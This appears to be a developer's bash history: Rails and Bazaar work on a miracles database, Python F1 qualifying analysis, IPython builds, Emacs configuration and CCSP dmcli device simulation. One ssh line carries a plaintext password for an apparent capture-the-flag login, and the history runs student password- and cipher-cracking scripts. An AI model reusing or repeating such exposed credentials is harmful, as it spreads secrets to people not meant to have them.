"boom dataimport seeding done?, maybe need to talk about Living on MiracleWorkers/Miracles linkers. But yeah, seems like its done" +be rails s +ls +ls +vim db/seeds.rb +./reseed +vim db/seeds.rb +./reseed +vim db/seeds.rb +./reseed +ls +irb +./reseed +vim db/data/MeasuringtheMiraculous.txt +vim db/data/Authors.txt +ls +bzr status +./reseed +bzr checkout gs:2011-miracledb/branches/sgintegration +l +ls +ls +ls +wgets-on-rails.googlecode.com/svn/google_charts_on_rails/lib/google_chart.rb +ls +ls +vim app/controllers/miracles_controller.rb +exit +./magic +exit +ls +ls +bzr update +lz +ls +ls +be rails s +be cucumber features +be rails s +ls +be cucumber +ls +ls +be cucumber +ls +ls +bzr update +ls +vim app/models/miracle +vim app/models/miracle.rb +be cucumber +bzr commit -m "make it pass" +cap deploy +ls +ls app/assets/ +ls +rm *.moved +ls +ls +bzr commit -m "js nchanged?" +cap deplo +cap deploy +ls +vim spec/models/miracle_ +vim spec/models/miracle_spec.rb +bzr commit -m "more fixing?" +cap deploy +ls +be rails s +ls app/assets/stylesheets/ +ls +vim token-input.css +ls +ls +ls +bzr upda +bzr update +be rake +ls +bzr checkout --revision 89 gs:2011-miracledb/branches/experimentalsearch +ls +ls +be cucumber features +./setup +be cucumber features +ls +ls +vim app/controllers/miracles_controller.rb +:Q +:q +be rake +ls +vim setup +vim notes.txt +ls +bzr checkout gs:2011-miracledb/branches/graphs +ls +cp trunk/db/development.sqlite3 graphs/db/ +./setup +be rails s +ls +be rake +exit +ls +ls +ls +bzr update +be rake +ls +vim spec/models/miracle_spec.rb +ls +ls db/data/ +vim db/data/Miracle-workers.txt +./reseed +vim db/seeds.rb +bzr status +bzr update +be cucumber +ls +bzr status +bzr commit -am "fixing seeds" +bzr commit -m "fixing seeds" +cap deploy +:q +ls +sudo apt-get update +sudo apt-get upgrade +ls +vim .bash_tweaks +ls +exit +ls +chromium-browser +ls +ls +git pull +ls +ipython +ipython --pylab +exit +ls +vim seeds.rb +:q +ls +ls +bzr update +ls +vim db/seeds.rb +./reseed +vim db/seeds.rb +exi +exit +./reseed +vim db/data/MiracleCategories.txt +bzr status +bzr up +ls +ls +bzr up +be rails s +bzr up +be rake +ls +bzr up +be rake +bzr up +be rails s +ls +bzr status +bzr commit -m "LOTS OF CHANGES DUE TO STYLE CHANGES OMFGGGG CAPSSSbzr statusbzr statusbzr statusbzr status" +:q +ls +ls +vim app/models/author.rb +:q +ls +bzr up +vpn-sheffield +bzr up +ls +vim app/views/ +:q +grep -r "miracles should find all" . +grep -r "miracles should find all" * +:q +be rake +be rspec spec/ +be cucumber +ls +bzr up +bzr commit -m "finishing putting stuff in the new layout, cucumber passess bibby's broken Rspec still broken" +exi +exit +vim spec/models/miracle_spec.rb +:q +cap deploy:drop +cap deploy:createdb +cap deploy +:q +vpn-sheffield +ls +be rspec spec/ +bzr status +bzr up +bzr commit -m "Pending bibbys test" +cap deploy +./magic +ls +vpn-sheffield +bzr st +cap deploy +cap deploy:seed +ls +vim Capfile +vim script/rails +grep -r 'deploy' . +vim config/deploy.rb +:q +vpn-sheffield +bzr up +vim db/seeds.rb +vim db/seeds.rb +./reseed +ls +bzr revert app/models/location.rb +ls +bzr commit -m "update seeds to add error puts" +./reseed +vim db/seeds.rb +vim Gemfile +chromium-browser & +ccsm +sudo apt-get install compizconfig-settings-manager +ccsm +sudo reboot +exit +exit +ls +ls +lc +ls +git pull +ls +git stash +ls +git stash +ls +git stash -h +git stash show +git stash clear +ls +vim radarStopwatchui.py +ls +git pull +git revert HEAD +ls +vim radarStopwatchui.py +ls +ls +rm -rf weatherprediction/ +git pull +ls +ls +ls +ls +git status +git stash +git pull +ls +git stash +git stash clear +git stash +ls +rm -rf darwinproject2011/ +ls +git checkout git@git.assembla.com:darwinproject2011.git +git clone git@git.assembla.com:darwinproject2011.git +ls +./radarStopwatchui.py +ls +ls +ls +ls +python radarStopwatchui.py +ls +vim radarStopwatchui.py +:q +ls +ls +./run_qualifying_predictor.py +vim qualifying_predictor.py +ls +ll +commit -am "removed pymc as not used" +git commit -am "removed pymc as not used" +git push +vim matlab_f1_parser.py +ls +vim run_qualifying_predictor.py +ls +ll +ls +.. +ls +.. +ls +utils/ +ls +ls +vim radarImageUtils.py +ls +ll +.. +ls +:q +ls +ls +python controller.py +:q +vim db/data/Miracle-workers.txt +./reseed +:q +ls +bzr up +ls +ls +ls +vim Miracle-workers.txt +... +./reseed +./setup +ls +./reseed +ls +vim db/seeds.rb +vim db/data/Miracle-workers.txt +ls +clear +ll +./reseed +:q +ls +bzr up +bzr commit -m "Fix data" +:q +ls +ls +./run_stopwatch.py +vim run_stopwatch.py +./run_stopwatch.py +... +git pull +ls +python viewer.py +python controller.py +sudo apt-get install python-pygame +python controller.py +ls +vim controller.py +... +ls +ll +git pull +ls +./radarStopwatchui.py +ll ../ +:q +ls +ssh stulogin.dcs.shef.ac.uk +ls +ssh level101@ctf.stri.pe e9gx26YEb2 +ssh level101@ctf.stri.pe +ls +ls +vim run_stopwatch.py +:q +ls +ssh stulogin.dcs.shef.ac.uk +:q +ls +ls +ls +vim run_stopwatch.py +:q +ssh stulogin.dcs.shef.ac.uk +:q +ls +ls +ls +vim pngCrack.png +ipython +exit +ssh stulogin.dcs.shef.ac.uk +:Q +shutdown +suo shutdown +shutdown now +sudo shutdown now +ls +sudo apt-get install python-magic +sudo apt-get install python3-magic +ls +rm -rf coverage/ +ls +be rake +ls +rm -rf coverage/ +be rspec +:q +ls +ssh stulogin.dcs.shef.ac.uk +ls +git clone git@gist.github.com:1900204.git gist-1900204 +ls +ls +vm imagecrack.py +vim imagecrack.py +ls +2to3 -w imagecrack.py +vim imagecrack.py +python3 imagecrack.py +vim imagecrack.py +:q +ls +python3 imagecrack.py +easy_install --version +easy_install numpy +sudo easy_install numpy +python3 imagecrack.py +python3 imagecrack.pystaffwww.dcs.shef.ac.uk/people/R.Clayton/UoSsecret.png +ssh stulogin.dcs.shef.ac.uk +:q +screen -r +ssh stulogin.dcs.shef.ac.uk +ls +git clone git@github.com:Tobias1087/COM4501.git +ls +ls +java PassCrack +vim PassCrack.java +javac PassCrack.java +java PassCrack +vim PassCrack.java +sudo apt-get install eclipse +eclipse +ls +ls +git pull +git stash +git pull +ls +ls +ls +vim run_datastructure_demo.py +vim matlab_f1_parser.py +ls +quit +exit +ipython +ls +bzr up +rake +./setup +:q +ipython +ipython3 +:q +ipython --pylab +ls +ll +ls +ls +less gameoflife.py +python gameoflife.py +vim gameoflife.py +ls +git pull +ls +ll +... +ls +ls +git pull +ls +mkdir python +ls +vim viginere.py +ls +ll +vim viginere.py +rake +l +ll +ls +ll +ls +rm *.moved +ls +ll -p +.. +bzt status +bzr status +bzr resolve --all +bzr list +bzr status +ls +bzr update +ls +ll +vim app/controllers/application_controller.rb +vim app/helpers/application_helper.rb +ls +ll +ls app/ +grep "json" . +grep "*json" . +grep -r "json" . +grep -r "respose *json" . +grep -r "respond*json" . +grep -r "respond" . +ls +vim app/controllers/feast_days_controller.rb +:q +ls +ls +vim viginere.py +:q +ls +ls +python matlab_f1_parser.py +python matlab_f1_parser.py ../rsa.mat +ipython +ls +ls +rm -rf trunk/ +bzr checkout gs:2011-miracledb/trunk +ls +ll +... +.. +ls +ls +... +git pull +ls +vim matlab_f1_parser.py +git status +git commit -am "Adding starttime/endtime" +git push +:q +python matlab_f1_parser.py ../rsa.mat +:q +ls +ls +l +vim Capfile +ls +ls +vim rails +vim server +ls +.. +ls +./magic +ls +be rails s +:q +ls +vim IPython/core/interactiveshell.py +ls +ls +ls +vim rich_ipython_widget.py +:x +:q +hg clone ssh://hg@bitbucket.org/robertkern/kernmagic +hg clone +ls +python setup.py +python setup.py build +python setup.py install +sudo python setup.py install +.. +ipython +ls +ipython3 +ipython --version +ipython --help +ipython qtconsole +sudo apt-get install pyzmq +sudo apt-get install libzmq +easy_install Downloads/pyzmq-2.1.11-py2.7-64b-linux.egg +sudo easy_install Downloads/pyzmq-2.1.11-py2.7-64b-linux.egg +sudo ldconfig +sudo apt-get install zmq +sudo apt-get update +sudo apt-get upgrade +sudo apt-get install libzmq-dev +sudo easy_install Downloads/pyzmq-2.1.11-py2.7-64b-linux.egg +ipython qtconsole +ls +ll +git clone git@github.com:Tobias1087/ipython.git +ls +ls +virtualenv ipython +sudo apt-get install python-virtualenv +./setup.py install +sudo ./setup.py install +ipython qtconsole --cache-size=0 +ipython qtconsole --cache-size=1 +ipython --cache-size=0 +ipython qtconsole --cache-size=0 +ls +./ipython.py +./ipython.py qtconsole --cache-size=0 +git lol +git lola +ls +git add +git add -i +git add -p +git commit -m "fixed issue 1442, by adding defaults to msg" +git push +iptest +./ipython.py +ls +ls +vim vigCipCrack.py +ls +ls +ls +vim rich_ipython_widget.py +ls +.. +ls +git add -p +git commit -m "making it PEP8 compliant" +git push +ls +l +ll +git lilst +lola +vim /home/aca08tog/.gitconfig +git lola +git lol +vim /home/aca08tog/.gitconfig +git lol +git lola +ls +ll +vim qualifying_predictor.py +vim run_qualifying_predictor.py +... +.. +ls +git pul +git pull +ls +ls +git pull +ll +ll +vim qualifying_predictor.py +... +.. +ls +ls +vim db/data/Authors.txt +bzr st +bzr commit -m "fixing the seeds" +bzr up +bzr commit -m "fixing the seeds" +:q +ls +ls +git pull +git lola +git lol +ls +ll +ls +ll +ls +ls +ll +bzr branch gs:2011-miracledb/trunk gs:2011-miracledb/branches/renameAttempt +bzr checkout gs:2011-miracledb/branches/renameAttempt +ls +be script/plugin install +ls +ll +ls +ls script/ +git clone git://github.com/hiroshi/script-refactor.git +ls +ls script-refactor/ +ls vendor/ +mv -rf script-refactor/ vendor/plugins/ +mv script-refactor/ vendor/plugins/ +ls +ruby vendor/plugins/script-refactor/install.rb +script/refactor +ll +ll script/ +ls +vim refactor +chmod +x refactor +ls +.. +script/refactor +vim script/refactor +vim script/refactor install +script/refactor install +rvm use 1.9.2 +ls +vim db/seeds.rb +script/refactor +ruby script/refactor +vim script/refactor +vim vendor/plugins/script-refactor/lib/script_refactor.rb +ruby vendor/plugins/script-refactor/lib/script_refactor.rb +ls +ls +vim install.rb +ruby uninstall.rb +ruby install.rb +vim in +vim install.rb +ruby install.rb +l +ls +./refactor +... +ls +ruby script-refactor/uninstall.rb +ll +... +ls +ll +ls +rm -rf vendor/plugins/script-refactor/ +ls +rm .gitkeep +ls +git clone git://github.com/digitalWestie/script-refactor.git +ls +ruby install.rb +l +... +ls +.. +ls +ls script/ +chmod +x script/refactor +script/refactor +ruby script/refactor +ls +ruby vendor/plugins/script-refactor/uninstall.rb +rm -rf vendor/plugins/script-refactor/ +ls +git clone git://github.com/digitalWestie/script-refactor.git +ls +ls +ruby rename_refactoring.rb +vim rename_script.rb +:q +ls +bzt st +bzr st +ruby vendor/plugins/script-refactor/lib/script_refactor.rb +ruby vendor/plugins/script-refactor/lib/rename_script.rb +ruby vendor/plugins/script-refactor/lib/script_refactor.rb +ruby vendor/plugins/script-refactor/lib/script_refactor.rb resource work text +script/refactor +chmod +x script/refactor +ruby vendor/plugins/script-refactor/install.rb +chmod +x script/refactor +script/refactor +:q +ls +ls +ll +ll +... +ipython +ll +ls +ls +mv Timing\ Data/ TimingData +ll +ll +ls +ll +mv Third\ Practice\ Session\ Sector\ Analysis.mat FP3.mat +ll +mv FP3.mat Third\ Practice\ Session\ Sector\ Analysis.mat +cp Third\ Practice\ Session\ Sector\ Analysis.mat FP3.mat +ll +.. +ls +cp Qualifying\ Session\ Sector\ Analysis.mat QSA.mat +ll +... +.. +ll +:1 +:q +l +ll +ll +python setup.py install vigCipCrack.py +python vigCipCrack.py +vim vig +vim vigCipCrack.py +python3 vigCipCrack.py +ll +ipython3 +ipython --version +ipython +ll +ipython-qtconsole +ll +... +ls +git pull +ll +python3 setup.py +python3 ipython.py +less setup +less setup.py +sudo apt-get install python3-all-dev +sudo apt-get install python3-setuptools +python3 setup.py +python3 setup.py build +ll +sudo python3 setup.py install +ipython3 +ll +.. +ls +ll +python3 setup.py +python3 setup.py build +sudo python3 setup.py install +ipython3 +vim /home/aca08tog/.config/ipython/profile_default/ipython_config.py +.. +ipython3 +ll +ll +ipython3 qt-console +ipython3-qtconsole +... +tar xvfz sip-4.13.2.tar.gz +ls +python3 configure.py +make +sudo make install +.. +tar xvfz PyQt-x11-gpl-4.9.1 +tar xvfz PyQt-x11-gpl-4.9.1.tar.gz +ls +python3 configure.py +... +ipython3-qtconsole +ll +make +sudo make install +C/usr/include/python3.2mu/pyatomic.h:59:1: warning: unused parameter ‘address’ [-Wunused-parameter] +sudo apt-get install gcc +make -w +make --Wfatal-errors +make -B +make - +make --as +make -Bk +l +ll +sudo apt-get install python-qt4 qt4-dev-tools python-qt4-dev pyqt4-dev-tools +ll +ipython3-qtconsole +ll +python3 configure.py +make +sudo apt-get install libxext-dev +make +sudo make +.. +ll +ls +... +:q +ll +ll +ipython3 --pylab +ipython --pylab +ls +./run_qualifying_predictor.py +ipython +./run_qualifying_predictor.py +ipython --pylab +./run_qualifying_predictor.py +git st +git add -p +git st +git commit -m "fixing run_qual and tidying up stuff" +git st +git push +ll +git st +git add -p +git commit -m "clarifying variable name" +git push +ll +unzip mari0-linux.zip +ll +ll m* +vim mari0_1.2.love +ll +love +sudo apt-get install love +love mari0_1.2.love +sudo apt-get remove love +sudo add-apt-repository ppa:bartbes/love-unstable +sudo apt-get update +sudo apt-get install love-unstable +love-unstable mari0_1.2.love +l +ll +git pull +ll +ls +vim qualifying_predictor.py +gts +... +git st +gst +ll +ll +vim qualifying_predictor.py +ll +./run_qualifying_predictor.py +vim run_qualifying_predictor.py +git st +ll +./qualifying_predictor.py +... +.. +l +ls +mv TimingData/ Timing\ Data +ll +... +ll +ls +... +git pull +ll +./run_qualifying_predictor.py +vim run_qualifying_predictor.py +git add -p +gt st +git st +git add -p +vim qualifying_predictor.py +git st +vim qualifying_predictor.py +git st +ls +vim run_script_qualifying.py +:q +ls +./run_script_qualifying.py +./run_script_qualifying.py gb1 +:q +ls +love-unstable mari0_1.2.love +exit +ls +vim run_script_qualifying.py +ll +git pull +ll +vim qualifying_predictor.py run_script_qualifying.py +:q +git grep 'naive_qualifying_predictions' + +python run_script_qualifying.py gb1 +ipython +python run_script_qualifying.py gb1 +./qualifying_predictor.py +python run_script_qualifying.py gb1 +ipython +ls +python run_script_qualifying.py gb1 +:q +ls +git checkout master +git merge addingNaive +git lol +ll +git diff +git branch +git commit -a +git add -p +git commit -m "merging adding" +git push +git branch -d addingNaive +git branch +git checkout evaluating +ll +:q +ipython +ll +ipython +ll +ll +.. +cp Timing\ Data.zip ~/darwin/resources/Timing\ Data/ +ll +unzip Timing\ Data.zip +ll +ll +.. +ll +.. +ll +ll +ll +ll +ll +ll Timing\ Data +rm -rf Timing\ Data# +rm -rf Timing\ Data +ll +rm Timing\ Data.zip +ll +cp ~/Downloads/latestTiming\ Data.zip ./ +ll +unzip latestTiming\ Data.zip +ll +mv -r Timing\ Data/ ./ +ll +mv latestTiming\ Data.zip ../ +ll +rm -rf Timing\ Data/ +.. +ll +unzip latestTiming\ Data.zip +ll +ll +.. +git grep 'root' +ll +vim information.py +:x +:q +ll +l +./run_script_qualifying.py +./run_script_qualifying.py gb1 +./run_script_qualifying.py all +ll +:q +git pull +ll +vim run_script_qualifying.py +ls +vim gb1 +ls +ls ../../../resources/Timing\ Data/ +cp gb1 au1 +vim au1 +python run_script_qualifying.py au1 +ls ../../../resources/Timing\ Data/0327_Australia/FP +python run_script_qualifying.py au1 +python run_script_qualifying.py gb1 +ls ../../../resources/Timing\ Data/ +ls ~/Downloads/ +ll ~/Downloads/ +... +.. +ll +cp Q/Qualifying\ Session\ Sector\ Analysis.mat Q.mat +cp FP3/Third\ Practice\ Session\ Sector\ Analysis.mat +cp FP3/Third\ Practice\ Session\ Sector\ Analysis.mat FP3.mat +ll +mv FP3.mat FP3 +ll +ll +.. +mv Q.mat Q/ +bzr up +ll +.. +vim Gemfile +./setup +ll +ll +mkdir seeds +ll +.. +mv seeds.rb seeds +ll +.. +be rake db:seed +rake db:seed +ll +ll +ll +mv seeds.rb normal.seeds.rb +ll +.. +ll +rake db:seed +rake db:reset +grep -r "latit" . +grep -r "long" . +grep -r "longitude" . +grep -r "latitude" . +git pull +git merge +ll +ll +git grep "Driver Name" +git grep "Driver Name" . +git grep "Drivername" . +git grep "drivername" . +git grep drivername . +git grep help +git help grep +git grep -i drivername +git grep -i "drivername" +git grep -i "name" +vim +ls +vim information.py matlab_f1_parser.py +:q +ll +./qualifying_predictor.py +./run_script_qualifying.py gb1 +vim run_script_qualifying.py +./run_script_qualifying.py gb1 +./run_script_qualifying.py all +:w +l +./run_script_qualifying.py gb1 +./run_script_qualifying.py all +./run_script_qualifying.py gb1 +./run_script_qualifying.py all +./run_script_qualifying.py gb1 +./run_script_qualifying.py all +ll +./run_stopwatch.py +python run_stopwatch.py +ll +./run_script_qualifying.py all +./run_script_qualifying.py suck +./qualifying_predictor.py +./run_script_qualifying.py suck +./qualifying_predictor.py +./qualifying_predictor.py aus +./run_script_qualifying.py aus +... +.. +l +mkdir git +ll +git checkout git@git.assembla.com:darwinproject2011.git +git clone git@git.assembla.com:darwinproject2011.git +ll +./qualifying_predictor.py +cp ~/darwin/resources/ ../../../ +cp -r ~/darwin/resources/ ../../../ +ll +ln -s ~/darwin/resources/ ../../../ +rm -rf ../../../resources/ +ln -s ~/darwin/resources/ ../../../ +./qualifying_predictor.py +./run_script_qualifying.py gb1 +vim gb1 +vim run_script_qualifying.py +./run_script_qualifying.py gb1 +ipython +ll +vim matlab_f1_parser.py +:q +ls +ll +./qualifying_predictor.py +./run_script_qualifying.py gb1 +AAAAA +./qualifying_predictor.py +./run_script_qualifying.py gb1 +./qualifying_predictor.py +./run_script_qualifying.py gb1 +./qualifying_predictor.py +./run_script_qualifying.py gb1 +./run_script_qualifying.py gb1 +ll +./run_script_qualifying.py gb1 +ll +./run_script_qualifying.py all + +./run_script_qualifying.py all +./run_script_qualifying.py suck +./run_script_qualifying.py all +./run_script_qualifying.py suck +git commit -am "maybe working we suck a bit though" +git status +git add . +git commit -am "maybe working we suck a bit though with adding files" +git push +git branch +git push evaluating +git pull +git push +git push origin evaluating +git lola +git pull +vim all +./run_script_qualifying.py all +./run_script_qualifying.py suck +:q +ll +./run_script_qualifying.py all +ll +ll +python run_stopwatch.py +git pull +git branch master +git checkout master +git stash +git checkout master +git pull +ll +vim all +rm .*.swp +vim all +:q +vim all +ll +rm *.swp +rm .*.swp +ll +vim all +:q +ll +rake +.. +ll +bzr branch gs:2011-miracledb/trunk gs:2011-miracledb/branches/superadmin +ll +bzr checkout gs:2011-miracledb/branches/superadmin +ll +ls +./setup +ll +be rails generate devise Admin +vim app/models/admin.rb +ll +vim app/views/admin_links/index.html.haml +bzr up +bzr merge gs:2011-miracledb/trunk +bzr st +bzr add . +bzr commit -m "first commit prior to trunk merge" +bzr merge gs:2011-miracledb/trunk +vim config/routes.rb +vim +lll +ll +mv OLDSEEDS db/seeds.rb +./reseed +ll +mv db/seeds.rb db/seeds/normal.seeds.rb +bzr st +bzr conflict +bzr reslove +bzr resolve +bzr st +bzr add .. +bzr add . +bzr commit -m "mostly done" +exit +ll +ll +ipython +vim run_script_qualifying.py +:q +ll +bzr up +ll +vim Gemfile +rm -rf db/seeds/ +ll +ll +vim seeds.rb +mv seeds.rb STRESSSEEDS +mv ../OLDSEEDS seeds.rb +.. +l +bzr st +bzr add . +bzr commit -m "reverting back to sseeds" +ll +bzr up +kk +ll +grep -ri "log in" . +vim app/views/layouts/application.html.haml +grep -ir "sign in" / +grep -ir "sign in" . +vim app/views/devise/registrations/new.html.haml +ll +vim app/views/devise/registrations/new.html.haml +ll +be rails s +find |grep helm +ls +ls +touch diary.org +emacs +ls +ls +ls +mv w3m w3m_old +ls +mv w3m .. +ls +ls +vi /home/guoding/.emacs +touch ~/Dropbox/think world/diary +touch ~/Dropbox/think\ world/diary +mkdir -p ~/Dropbox/think\ world && touch ~/Dropbox/think\ world/diary +emacs +exit +man rsync +ls +rsync --progress ccsp_mainline_pc_simulation/ abc/ +rsync --progress ccsp_mainline_pc_simulation/ abc/ -rf +rsync --progress ccsp_mainline_pc_simulation/ abc +ls +ls abc/ +rsync --progress ccsp_mainline_pc_simulation abc +rsync ccsp_mainline_pc_simulation/ abc +rsync ccsp_mainline_pc_simulation/ abc -rf +man rsync +rsync -avz --progress ccsp_mainline_pc_simulation abc +ls +rm abc/ -rf +ls +man rsync +ls +cp /mnt/hgfs/下载/w3m-0.5.3.tar.gz . +cp w3m-0.5.3.tar.gz ~/.emacs.d +ls +tar -zxvf w3m +tar -zxvf w3m-0.5.3.tar.gz +ls +./configure +make install +make +ls +vi +vi ../elpa/w3m-readme.txt +ls +vim Makefile.in +./configure +ls +find . -name gc.h +git clonesorphanage/w3m.git +ls w3m +ls +ls +git clonesorphanage/w3m.git +ls +vi install-sh +bash install-sh +make +vi README +./configure +vim +emacs +emacs . +ls +ls +git pullsov/solarized-emacs.git +ls +ls -alt +ls org-clock-save.el +ls -t +emacs . +ls -t +ls -alt +find - name solarized-light-theme.el +find . -name solarized-light-theme.el +git clonesov/solarized-emacs.git +ls +vi ../.emacs +emacs +exit +ls +ls +ls |grep auto +ls +vi ../.emacs +ls +ls +vi w3m-readme.txt +ls +ls +vi +./configure +make install +ls +find . |grep w3m +vi +ls +ls +mv w3m-20121224.1747/ temp +emacs +vi evil-readme.txt +vi /home/guoding/.emacs +ls +ls +vi evil/ +ls +grep w3m . -R +find . -mmin -30 +find . -mmin -30|xargs grep w3m +find . -mmin -30|xargs grep w3m-auto +find . -mmin -30|xargs grep auto +find . -mmin -30|xargs grep auto.el +find . -mmin -30|xargs grep autos.el +find . -mmin -30|xargs grep autoloads.el +find . -mmin -30|xargs grep autoloads +find . -mmin -30 +vi ./elpa/archives/melpa +find . -mmin -30>123 +vi 123 +vim 123 +ls +ls +vi w3m-readme.txt +ls +vi 123 +ls +vi 123 +cat 123|xargs grep w3m +ls +mv temp/ w3m-20121224.1747/ +emacs +emacs +ls +ls +find . |grep org-w3m +ls +mv w3m emacs-w3m +emacs . +sudo apt-get install w3mmee w3mmee-img +sudo apt-get install w3m +ls +find . -mmtime 10 +find . -mmin 10 +find . -mmin 100 +find . -mmin -10 +find . -mmin -5 +find . -mmin -5 +emacs +emacs +emacs +emacs +emacs +ls +ls +emacs . +exit +sudo apt-get install webkit +sudo apt-cache search kit +sudo apt-cache search kit|grep web +exit +vi /home/guoding/.emacs.d/solarized-emacs/solarized-light-theme.el +emacs +emacs --debug-init +exit +emacs +emacs +find . -name init* +vi .emacs.desktop +vi ../.emacs +find . -name package.el +emacs +exit +find . |grep package +ls +emacs . +emacs --version +df -h +ls +vi .emacs +ls +ls +emacs +exit +emacs +emacs +emacs +emacs +emacs . +gep "solarized.el" . -R +grep "solarized.el" . -R +mv solarized-emacs/ tmp/ +emacs +ls +ls +./dmcli eRT getn Device. +ls +./dmcli eRT getv +ls +find . -name libccsp_common.so +ls +export $PATH=$PWD:$PATH +export PATH=$PWD:$PATH +./dmcli eRT getv +./dmcli eRT getv Device. +export LD_LIBRARY_PATH=$PWD:$LD_LIBRARY_PATH +./dmcli eRT getv Device. +export LD_LIBRARY_PATH=$PWD:.:$PWD/lib:$PWD/../../Stage/pc-ubuntu32/lib:/lib:/usr/lib:$LD_LIBRARY_PATH +export DBUS_SYSTEM_BUS_ADDRESS=unix:path=/var/run/dbus/system_bus_socket +export PATH=$PATH:$PWD:$PWD/../../Stage/pc-ubuntu32/bin:$PWD/../../Stage/pc-ubuntu32/sbin:$PWD/../../Stage/pc-ubuntu32/usr/sbin +./dmcli eRT getv Device. +./dmcli eRT getv Device. |grep Moca +./dmcli eRT getv Device. |grep ca +ls +vim ma +ls +./dmcli eRT getn Device. +ls +ls +find . |grep xml +find . |grep *xml +find . |grep "*xml" +find . |grep "\.xml" +ls +ls +git log +ls +l +ls +ls +find . -name CcspMocaAgentSsp +./moca/CcspMocaAgentSsp +ps +ps -aux|grep moca +./dmcli getv Device. +./dmcli eRT getv Device. +./dmcli eRT getv Device.|grep Moca +./dmcli eRT getv Device.|grep moca +./dmcli eRT getv Device.|grep -i moca +./dmcli eRT getv Device.|grep -i mo +./dmcli eRT getv Device. +ps -ef|grep moca +kill 22276 +ps -ef|grep moca +ls +bash experiment.sh +whoami +ls +ls +grep mouse-1 . -R +ls +ls +grep "COSA_init" . -R +ls +ls |grep Moca +ls +ls +啦啦啦 +exit +ls +ls +ls +source ./cosa_start.sh +ls +pwd +ls +pwd +ls +ls +ls +vi Makefile +ls +rm build-pc-ubuntu32/ -rf +./build.sh +ps +ps aux|grep -i ssp +ls +su +./factory_reset.sh +su +ls +ls +./build.sh +emacs +vi /home/guoding/.bashrc +sudo reboot +reboot +sudo reboot +exit +ping +ls +ls +gdd main.c -g +gcc main.c -g +gcc main.c -g +grep brctl . -R +./Stage/pc-ubuntu32/etc/utopia/service.d/service_multinet.sh: brctl delbr $BRIDGE +find . -name service_multinet.sh +meld ./Stage/pc-ubuntu32/etc/utopia/service.d ./CcspCommonLib/Utopia/source/scripts/init/service.d/ +ls +pwd +ls +pwd +ls + ' + + +' +ls +grep "background-color" . -R +sudo apt-get install clisp +clisp +sudo apt-get install sbcl +sbcl +ls +pwd +ls +ls /media/floppy +ls /media/ +ls /media/ +df -h +ls /media/ +ls /media/floppy +df -h +pwd +sudo source ./cosa_start.sh +source ./cosa_start.sh +emacs +ps -aux|grep -i ccsp +ls +ls +ls +ls +ls +./cosa_start.sh +sudo ./cosa_start.sh +ls +./CcspMocaAgentSsp -subsys eRT. & +vi ../cosa_start.sh +export LD_LIBRARY_PATH=$PWD:.:$PWD/lib:$PWD/../../Stage/pc-ubuntu32/lib:/lib:/usr/lib:$LD_LIBRARY_PATH +export DBUS_SYSTEM_BUS_ADDRESS=unix:path=/var/run/dbus/system_bus_socket +export PATH=$PATH:$PWD:$PWD/../../Stage/pc-ubuntu32/bin:$PWD/../../Stage/pc-ubuntu32/sbin:$PWD/../../Stage/pc-ubuntu32/usr/sbin +./CcspMocaAgentSsp -subsys eRT. & +ls +export LD_LIBRARY_PATH=$PWD:.:$PWD/lib:$PWD/../../Stage/pc-ubuntu32/lib:/lib:/usr/lib:$LD_LIBRARY_PATH +export DBUS_SYSTEM_BUS_ADDRESS=unix:path=/var/run/dbus/system_bus_socket +export PATH=$PATH:$PWD:$PWD/../../Stage/pc-ubuntu32/bin:$PWD/../../Stage/pc-ubuntu32/sbin:$PWD/../../Stage/pc-ubuntu32/usr/sbin +./CcspMocaAgentSsp -subsys eRT. & +ls +./dmcli eRT getn Device. +dmcli eRT getn Device.MoCA. +dmcli eRT setv Device.MoCA.X_CISCO_COM_ProvisioningFilename string aaa +dmcli eRT getn Device.MoCA. +dmcli eRT getv Device.MoCA. +dmcli eRT getn |grep -i wifil +dmcli eRT getn |grep -i wifi +dmcli eRT getn |grep -i wi +dmcli eRT getn Device. +ls + +dmcli eRT getv Device. +dmcli eRT getv Device.|grep -i moc +dmcli eRT getv Device.|grep -i moca +dmcli eRT setv Device.MoCA.X_CISCO_COM_MoCA_EnableDisable true +dmcli eRT setv Device.MoCA.X_CISCO_COM_MoCA_EnableDisable bool true +dmcli eRT getv Device.|grep -i moca +dmcli eRT getv Device. +dmcli eRT setv Device.MoCA.X_CISCO_COM_MoCA_EnableDisable bool 1 +dmcli eRT getv Device. +dmcli eRT setv Device.MoCA.X_CISCO_COM_MoCA_EnableDisable bool 0 +dmcli eRT getv Device. +dmcli eRT getv Device.MoCA. +dmcli eRT addtable Device.MoCA. +dmcli eRT add Device.MoCA. +dmcli eRT +dmcli eRT getv Device.MoCA. +dmcli +dmcli eRT +ls +git status . +git status +ls +git status +git diff hal/source/moca_hal.c +ls +ls +find . -name cosa_start.sh +vimdiff ./platform_repo/CcspCommonLib/pc/scripts/cosa_start.sh ./ccsp/CcspCommonLib/custom/platform/scripts/cosa_start.sh +git log ./platform_repo/CcspCommonLib/pc/scripts/cosa_start.sh +git log ./ccsp/CcspCommonLib/custom/platform/scripts/cosa_start.sh +git log ./platform_repo/CcspCommonLib/pc/scripts/cosa_start.sh +ls +vi /etc/ +ls +git log ./platform_repo/CcspCommonLib/pc/scripts/cosa_start.sh +ls +grep CcspMocaAgentSsp . -R +find . -name cosa_start.sh +ps -aux|grep -i moca +kill 6068 +ls +./cosa_start.sh stop +sudo ./cosa_start.sh stop +./cosa_start.sh +vimdiff /home/guoding/Public/ccsp_mainline_pc_simulation/platform_repo/CcspCommonLib/pc/scripts/cosa_start.sh ./cosa_start.sh +cp /home/guoding/Public/ccsp_mainline_pc_simulation/platform_repo/CcspCommonLib/pc/scripts/cosa_start.sh ./cosa_start.sh +./cosa_start.sh +sudo ./cosa_start.sh +dmcli eRT getn Device. +man bash +ls +git status +git status>123 +vi 123 +cat 123|xargs git diff +git pull +git remote -v +ls /home/guoding/Public/ccsp_mainline_pc_simulation/ccsp/Out/pc-ubuntu32/lib/libcrypto.so.1.0.0 +ls /home/guoding/Public/ccsp_mainline_pc_simulation/ccsp/Out/pc-ubuntu32/lib/libcrypto.so.1.0.0 -alt +env +git pull +env |grep libcrypto +env |grep libcry +ssh +ls +git diff +git log -p +vi /home/guoding/.bashrc +alias ls ls -alt +ls +alias ccollab='~/~/ccollab-cmdline/ccollabgui' +ccollab +alias ccollab='~/ccollab-cmdline/ccollabgui' +ccollab +ls +git push +ls +ls +ls +ls +make +./build_helper.sh dpc3941 atom ga +-rw-r--r-- 1 root root 6609276 Apr 4 22:54 ramdisk.ext2.initrd.gz + +ifconfig +ls +pwd +ls +ls +ls +sudo brctl +man brctl +sudo apt-get install brctl +find . |grep brctl 